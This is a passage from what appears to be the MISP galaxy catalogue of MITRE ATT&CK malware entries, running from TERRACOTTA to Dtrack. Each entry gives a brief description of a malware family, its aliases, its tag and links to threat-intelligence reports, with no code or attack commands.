The tag is: misp-galaxy:mitre-malware="TERRACOTTA - S0545"

TERRACOTTA - S0545 is also known as:

  • TERRACOTTA

Table 7754. Table References

Links

https://attack.mitre.org/software/S0545

https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study

Egregor - S0554

[Egregor](https://attack.mitre.org/software/S0554) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://attack.mitre.org/software/S0554) and Sekhmet ransomware, as well as [Maze](https://attack.mitre.org/software/S0449) ransomware.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)(Citation: Security Boulevard Egregor Oct 2020)

The tag is: misp-galaxy:mitre-malware="Egregor - S0554"

Egregor - S0554 is also known as:

  • Egregor

Table 7755. Table References

Links

https://attack.mitre.org/software/S0554

https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/

https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary

https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

Metamorfo - S0455

[Metamorfo](https://attack.mitre.org/software/S0455) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019)

The tag is: misp-galaxy:mitre-malware="Metamorfo - S0455"

Metamorfo - S0455 is also known as:

  • Metamorfo

  • Casbaneiro

Table 7756. Table References

Links

https://attack.mitre.org/software/S0455

https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767

https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/

BlackMould - S0564

[BlackMould](https://attack.mitre.org/software/S0564) is a web shell based on [China Chopper](https://attack.mitre.org/software/S0020) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://attack.mitre.org/groups/G0093) against telecommunication providers.(Citation: Microsoft GALLIUM December 2019)

The tag is: misp-galaxy:mitre-malware="BlackMould - S0564"

BlackMould - S0564 is also known as:

  • BlackMould

Table 7757. Table References

Links

https://attack.mitre.org/software/S0564

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

ProLock - S0654

[ProLock](https://attack.mitre.org/software/S0654) is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with [QakBot](https://attack.mitre.org/software/S0650). [ProLock](https://attack.mitre.org/software/S0654) is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.(Citation: Group IB Ransomware September 2020)

The tag is: misp-galaxy:mitre-malware="ProLock - S0654"

ProLock - S0654 is also known as:

  • ProLock

Table 7758. Table References

Links

https://attack.mitre.org/software/S0654

https://groupib.pathfactory.com/ransomware-reports/prolock_wp

SharpStage - S0546

[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)

The tag is: misp-galaxy:mitre-malware="SharpStage - S0546"

SharpStage - S0546 is also known as:

  • SharpStage

Table 7759. Table References

Links

https://attack.mitre.org/software/S0546

https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

BendyBear - S0574

[BendyBear](https://attack.mitre.org/software/S0574) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://attack.mitre.org/software/S0574) shares a variety of features with [Waterbear](https://attack.mitre.org/software/S0579), malware previously attributed to the Chinese cyber espionage group [BlackTech](https://attack.mitre.org/groups/G0098).(Citation: Unit42 BendyBear Feb 2021)

The tag is: misp-galaxy:mitre-malware="BendyBear - S0574"

BendyBear - S0574 is also known as:

  • BendyBear

Table 7760. Table References

Links

https://attack.mitre.org/software/S0574

https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/

BackConfig - S0475

[BackConfig](https://attack.mitre.org/software/S0475) is a custom Trojan with a flexible plugin architecture that has been used by [Patchwork](https://attack.mitre.org/groups/G0040).(Citation: Unit 42 BackConfig May 2020)

The tag is: misp-galaxy:mitre-malware="BackConfig - S0475"

BackConfig - S0475 is also known as:

  • BackConfig

Table 7761. Table References

Links

https://attack.mitre.org/software/S0475

https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/

DropBook - S0547

[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)

The tag is: misp-galaxy:mitre-malware="DropBook - S0547"

DropBook - S0547 is also known as:

  • DropBook

Table 7762. Table References

Links

https://attack.mitre.org/software/S0547

https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

Netwalker - S0457

[Netwalker](https://attack.mitre.org/software/S0457) is fileless ransomware written in PowerShell and executed directly in memory.(Citation: TrendMicro Netwalker May 2020)

The tag is: misp-galaxy:mitre-malware="Netwalker - S0457"

Netwalker - S0457 is also known as:

  • Netwalker

Table 7763. Table References

Links

https://attack.mitre.org/software/S0457

https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/

AppleJeus - S0584

[AppleJeus](https://attack.mitre.org/software/S0584) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://attack.mitre.org/software/S0584) has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://attack.mitre.org/software/S0584) has been used to distribute the [FALLCHILL](https://attack.mitre.org/software/S0181) RAT.(Citation: CISA AppleJeus Feb 2021)

The tag is: misp-galaxy:mitre-malware="AppleJeus - S0584"

AppleJeus - S0584 is also known as:

  • AppleJeus

Table 7764. Table References

Links

https://attack.mitre.org/software/S0584

https://us-cert.cisa.gov/ncas/alerts/aa21-048a

Mandrake - S0485

[Mandrake](https://attack.mitre.org/software/S0485) is a sophisticated Android espionage platform that has been active in the wild since at least 2016. [Mandrake](https://attack.mitre.org/software/S0485) is very actively maintained, with sophisticated features and attacks that are executed with surgical precision.

[Mandrake](https://attack.mitre.org/software/S0485) has gone undetected for several years by providing legitimate, ad-free applications with social media and real reviews to back the apps. The malware is only activated when the operators issue a specific command.(Citation: Bitdefender Mandrake)

The tag is: misp-galaxy:mitre-malware="Mandrake - S0485"

Mandrake - S0485 is also known as:

  • Mandrake

  • oxide

  • briar

  • ricinus

  • darkmatter

Table 7765. Table References

Links

https://attack.mitre.org/software/S0485

https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf

Ramsay - S0458

[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)

The tag is: misp-galaxy:mitre-malware="Ramsay - S0458"

Ramsay - S0458 is also known as:

  • Ramsay

Table 7766. Table References

Links

https://attack.mitre.org/software/S0458

https://www.programmersought.com/article/62493896999/

https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/

RDAT - S0495

[RDAT](https://attack.mitre.org/software/S0495) is a backdoor used by the suspected Iranian threat group [OilRig](https://attack.mitre.org/groups/G0049). [RDAT](https://attack.mitre.org/software/S0495) was originally identified in 2017 and targeted companies in the telecommunications sector.(Citation: Unit42 RDAT July 2020)

The tag is: misp-galaxy:mitre-malware="RDAT - S0495"

RDAT - S0495 is also known as:

  • RDAT

Table 7767. Table References

Links

https://attack.mitre.org/software/S0495

https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/

SilkBean - S0549

[SilkBean](https://attack.mitre.org/software/S0549) is a piece of Android surveillanceware containing comprehensive remote access tool (RAT) functionality that has been used in targeting of the Uyghur ethnic group.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="SilkBean - S0549"

SilkBean - S0549 is also known as:

  • SilkBean

Table 7768. Table References

Links

https://attack.mitre.org/software/S0549

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

MechaFlounder - S0459

[MechaFlounder](https://attack.mitre.org/software/S0459) is a python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload uses a combination of actor developed code and code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)

The tag is: misp-galaxy:mitre-malware="MechaFlounder - S0459"

MechaFlounder - S0459 is also known as:

  • MechaFlounder

Table 7769. Table References

Links

https://attack.mitre.org/software/S0459

https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/

SpicyOmelette - S0646

[SpicyOmelette](https://attack.mitre.org/software/S0646) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://attack.mitre.org/groups/G0080) since at least 2018.(Citation: Secureworks GOLD KINGSWOOD September 2018)

The tag is: misp-galaxy:mitre-malware="SpicyOmelette - S0646"

SpicyOmelette - S0646 is also known as:

  • SpicyOmelette

Table 7770. Table References

Links

https://attack.mitre.org/software/S0646

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

Pandora - S0664

[Pandora](https://attack.mitre.org/software/S0664) is a multistage kernel rootkit with backdoor functionality that has been in use by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021)

The tag is: misp-galaxy:mitre-malware="Pandora - S0664"

Pandora - S0664 is also known as:

  • Pandora

Table 7771. Table References

Links

https://attack.mitre.org/software/S0664

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

WindTail - S0466

[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)

The tag is: misp-galaxy:mitre-malware="WindTail - S0466"

WindTail - S0466 is also known as:

  • WindTail

Table 7772. Table References

Links

https://attack.mitre.org/software/S0466

https://objective-see.com/blog/blog_0x3B.html

https://objective-see.com/blog/blog_0x3D.html

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf

CharmPower - S0674

[CharmPower](https://attack.mitre.org/software/S0674) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Check Point APT35 CharmPower January 2022)

The tag is: misp-galaxy:mitre-malware="CharmPower - S0674"

CharmPower - S0674 is also known as:

  • CharmPower

Table 7773. Table References

Links

https://attack.mitre.org/software/S0674

https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

TajMahal - S0467

[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.(Citation: Kaspersky TajMahal April 2019)

The tag is: misp-galaxy:mitre-malware="TajMahal - S0467"

TajMahal - S0467 is also known as:

  • TajMahal

Table 7774. Table References

Links

https://attack.mitre.org/software/S0467

https://securelist.com/project-tajmahal/90240/

Turian - S0647

[Turian](https://attack.mitre.org/software/S0647) is a backdoor that has been used by [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://attack.mitre.org/software/S0647) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.(Citation: ESET BackdoorDiplomacy Jun 2021)

The tag is: misp-galaxy:mitre-malware="Turian - S0647"

Turian - S0647 is also known as:

  • Turian

Table 7775. Table References

Links

https://attack.mitre.org/software/S0647

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

Valak - S0476

[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)

The tag is: misp-galaxy:mitre-malware="Valak - S0476"

Valak - S0476 is also known as:

  • Valak

Table 7776. Table References

Links

https://attack.mitre.org/software/S0476

https://unit42.paloaltonetworks.com/valak-evolution/

https://www.cybereason.com/blog/valak-more-than-meets-the-eye

Bonadan - S0486

[Bonadan](https://attack.mitre.org/software/S0486) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://attack.mitre.org/software/S0486) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.(Citation: ESET ForSSHe December 2018)

The tag is: misp-galaxy:mitre-malware="Bonadan - S0486"

Bonadan - S0486 is also known as:

  • Bonadan

Table 7777. Table References

Links

https://attack.mitre.org/software/S0486

https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf

Skidmap - S0468

[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)

The tag is: misp-galaxy:mitre-malware="Skidmap - S0468"

Skidmap - S0468 is also known as:

  • Skidmap

Table 7778. Table References

Links

https://attack.mitre.org/software/S0468

https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/

ABK - S0469

[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="ABK - S0469"

ABK - S0469 is also known as:

  • ABK

Table 7779. Table References

Links

https://attack.mitre.org/software/S0469

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

SMOKEDHAM - S0649

[SMOKEDHAM](https://attack.mitre.org/software/S0649) is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)

The tag is: misp-galaxy:mitre-malware="SMOKEDHAM - S0649"

SMOKEDHAM - S0649 is also known as:

  • SMOKEDHAM

Table 7780. Table References

Links

https://attack.mitre.org/software/S0649

https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

DRATzarus - S0694

[DRATzarus](https://attack.mitre.org/software/S0694) is a remote access tool (RAT) that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) to target the defense and aerospace organizations globally since at least summer 2020. [DRATzarus](https://attack.mitre.org/software/S0694) shares similarities with [Bankshot](https://attack.mitre.org/software/S0239), which was used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in 2017 to target the Turkish financial sector.(Citation: ClearSky Lazarus Aug 2020)

The tag is: misp-galaxy:mitre-malware="DRATzarus - S0694"

DRATzarus - S0694 is also known as:

  • DRATzarus

Table 7781. Table References

Links

https://attack.mitre.org/software/S0694

https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

REvil - S0496

[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)

The tag is: misp-galaxy:mitre-malware="REvil - S0496"

REvil - S0496 is also known as:

  • REvil

  • Sodin

  • Sodinokibi

Table 7782. Table References

Links

https://attack.mitre.org/software/S0496

https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/

https://securelist.com/sodin-ransomware/91473/

https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html

https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data

https://www.group-ib.com/whitepapers/ransomware-uncovered.html

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/

https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware

https://www.secureworks.com/blog/revil-the-gandcrab-connection

https://www.secureworks.com/research/revil-sodinokibi-ransomware

https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis

Goopy - S0477

[Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017)

The tag is: misp-galaxy:mitre-malware="Goopy - S0477"

Goopy - S0477 is also known as:

  • Goopy

Table 7783. Table References

Links

https://attack.mitre.org/software/S0477

https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf

EventBot - S0478

[EventBot](https://attack.mitre.org/software/S0478) is an Android banking trojan and information stealer that abuses Android’s accessibility service to steal data from various applications.(Citation: Cybereason EventBot) [EventBot](https://attack.mitre.org/software/S0478) was designed to target over 200 different banking and financial applications, the majority of which are European bank and cryptocurrency exchange applications.(Citation: Cybereason EventBot)

The tag is: misp-galaxy:mitre-malware="EventBot - S0478"

EventBot - S0478 is also known as:

  • EventBot

Table 7784. Table References

Links

https://attack.mitre.org/software/S0478

https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born

Kessel - S0487

[Kessel](https://attack.mitre.org/software/S0487) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://attack.mitre.org/software/S0487) has been active since its C2 domain began resolving in August 2018.(Citation: ESET ForSSHe December 2018)

The tag is: misp-galaxy:mitre-malware="Kessel - S0487"

Kessel - S0487 is also known as:

  • Kessel

Table 7785. Table References

Links

https://attack.mitre.org/software/S0487

https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf

Dacls - S0497

[Dacls](https://attack.mitre.org/software/S0497) is a multi-platform remote access tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least December 2019.(Citation: TrendMicro macOS Dacls May 2020)(Citation: SentinelOne Lazarus macOS July 2020)

The tag is: misp-galaxy:mitre-malware="Dacls - S0497"

Dacls - S0497 is also known as:

  • Dacls

Table 7786. Table References

Links

https://attack.mitre.org/software/S0497

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/

https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

WolfRAT - S0489

[WolfRAT](https://attack.mitre.org/software/S0489) is malware based on a leaked version of [Dendroid](https://attack.mitre.org/software/S0301) that has primarily targeted Thai users. [WolfRAT](https://attack.mitre.org/software/S0489) has most likely been operated by the now defunct organization Wolf Research.(Citation: Talos-WolfRAT)

The tag is: misp-galaxy:mitre-malware="WolfRAT - S0489"

WolfRAT - S0489 is also known as:

  • WolfRAT

Table 7787. Table References

Links

https://attack.mitre.org/software/S0489

https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html

Cryptoistic - S0498

[Cryptoistic](https://attack.mitre.org/software/S0498) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032).(Citation: SentinelOne Lazarus macOS July 2020)

The tag is: misp-galaxy:mitre-malware="Cryptoistic - S0498"

Cryptoistic - S0498 is also known as:

  • Cryptoistic

Table 7788. Table References

Links

https://attack.mitre.org/software/S0498

https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

Hancitor - S0499

[Hancitor](https://attack.mitre.org/software/S0499) is a downloader that has been used by [Pony](https://attack.mitre.org/software/S0453) and other information stealing malware.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)

The tag is: misp-galaxy:mitre-malware="Hancitor - S0499"

Hancitor - S0499 is also known as:

  • Hancitor

  • Chanitor

Table 7789. Table References

Links

https://attack.mitre.org/software/S0499

https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/

https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html

CHEMISTGAMES - S0555

[CHEMISTGAMES](https://attack.mitre.org/software/S0555) is a modular backdoor that has been deployed by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CYBERWARCON CHEMISTGAMES)

The tag is: misp-galaxy:mitre-malware="CHEMISTGAMES - S0555"

CHEMISTGAMES - S0555 is also known as:

  • CHEMISTGAMES

Table 7790. Table References

Links

https://attack.mitre.org/software/S0555

https://www.youtube.com/watch?v=xoNSbm1aX_w

BusyGasper - S0655

[BusyGasper](https://attack.mitre.org/software/S0655) is Android spyware that has been in use since May 2016. There have been less than 10 victims, all who appear to be located in Russia, that were all infected via physical access to the device.(Citation: SecureList BusyGasper)

The tag is: misp-galaxy:mitre-malware="BusyGasper - S0655"

BusyGasper - S0655 is also known as:

  • BusyGasper

Table 7791. Table References

Links

https://attack.mitre.org/software/S0655

https://securelist.com/busygasper-the-unfriendly-spy/87627/

Raindrop - S0565

[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)

The tag is: misp-galaxy:mitre-malware="Raindrop - S0565"

Raindrop - S0565 is also known as:

  • Raindrop

Table 7792. Table References

Links

https://attack.mitre.org/software/S0565

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

Conti - S0575

[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://attack.mitre.org/software/S0575) has been deployed via [TrickBot](https://attack.mitre.org/software/S0266) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)

The tag is: misp-galaxy:mitre-malware="Conti - S0575"

Conti - S0575 is also known as:

  • Conti

Table 7793. Table References

Links

https://attack.mitre.org/software/S0575

https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/

https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/

https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware

Kerrdown - S0585

[Kerrdown](https://attack.mitre.org/software/S0585) is a custom downloader that has been used by [APT32](https://attack.mitre.org/groups/G0050) since at least 2018 to install spyware from a server on the victim’s network.(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)

The tag is: misp-galaxy:mitre-malware="Kerrdown - S0585"

Kerrdown - S0585 is also known as:

  • Kerrdown

Table 7794. Table References

Links

https://attack.mitre.org/software/S0585

https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/

https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf

SUNBURST - S0559

[SUNBURST](https://attack.mitre.org/software/S0559) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)

The tag is: misp-galaxy:mitre-malware="SUNBURST - S0559"

SUNBURST - S0559 is also known as:

  • SUNBURST

  • Solorigate

Table 7795. Table References

Links

https://attack.mitre.org/software/S0559

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

ThiefQuest - S0595

[ThiefQuest](https://attack.mitre.org/software/S0595) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://attack.mitre.org/software/S0595) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.(Citation: Reed thiefquest fake ransom) Even though [ThiefQuest](https://attack.mitre.org/software/S0595) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)

The tag is: misp-galaxy:mitre-malware="ThiefQuest - S0595"

ThiefQuest - S0595 is also known as:

  • ThiefQuest

  • MacRansom.K

  • EvilQuest

Table 7796. Table References

Links

https://attack.mitre.org/software/S0595

https://blog.malwarebytes.com/detections/osx-thiefquest/

https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/

https://objective-see.com/blog/blog_0x60.html

https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/

ThreatNeedle - S0665

[ThreatNeedle](https://attack.mitre.org/software/S0665) is a backdoor that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Manuscrypt (a.k.a. NukeSped) malware family.(Citation: Kaspersky ThreatNeedle Feb 2021)

The tag is: misp-galaxy:mitre-malware="ThreatNeedle - S0665"

ThreatNeedle - S0665 is also known as:

  • ThreatNeedle

Table 7797. Table References

Links

https://attack.mitre.org/software/S0665

https://securelist.com/lazarus-threatneedle/100803/

BLUELIGHT - S0657

[BLUELIGHT](https://attack.mitre.org/software/S0657) is a remote access Trojan used by [APT37](https://attack.mitre.org/groups/G0067) that was first observed in early 2021.(Citation: Volexity InkySquid BLUELIGHT August 2021)

The tag is: misp-galaxy:mitre-malware="BLUELIGHT - S0657"

BLUELIGHT - S0657 is also known as:

  • BLUELIGHT

Table 7798. Table References

Links

https://attack.mitre.org/software/S0657

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

MegaCortex - S0576

[MegaCortex](https://attack.mitre.org/software/S0576) is ransomware that first appeared in May 2019. (Citation: IBM MegaCortex) [MegaCortex](https://attack.mitre.org/software/S0576) has mainly targeted industrial organizations. (Citation: FireEye Ransomware Disrupt Industrial Production)(Citation: FireEye Financial Actors Moving into OT)

The tag is: misp-galaxy:mitre-malware="MegaCortex - S0576"

MegaCortex - S0576 is also known as:

  • MegaCortex

Table 7799. Table References

Links

https://attack.mitre.org/software/S0576

https://securityintelligence.com/posts/from-mega-to-giga-cross-version-comparison-of-top-megacortex-modifications/

https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

Dtrack - S0567

[Dtrack](https://attack.mitre.org/software/S0567) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://attack.mitre.org/software/S0567) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: Kaspersky Dtrack)(Citation: Securelist Dtrack)(Citation: Dragos WASSONITE)(Citation: CyberBit Dtrack)(Citation: ZDNet Dtrack)

The tag is: misp-galaxy:mitre-malware="Dtrack - S0567"

Dtrack - S0567 is also known as:

  • Dtrack

Table 7800. Table References

Links

https://attack.mitre.org/software/S0567

https://securelist.com/my-name-is-dtrack/93338/

https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers

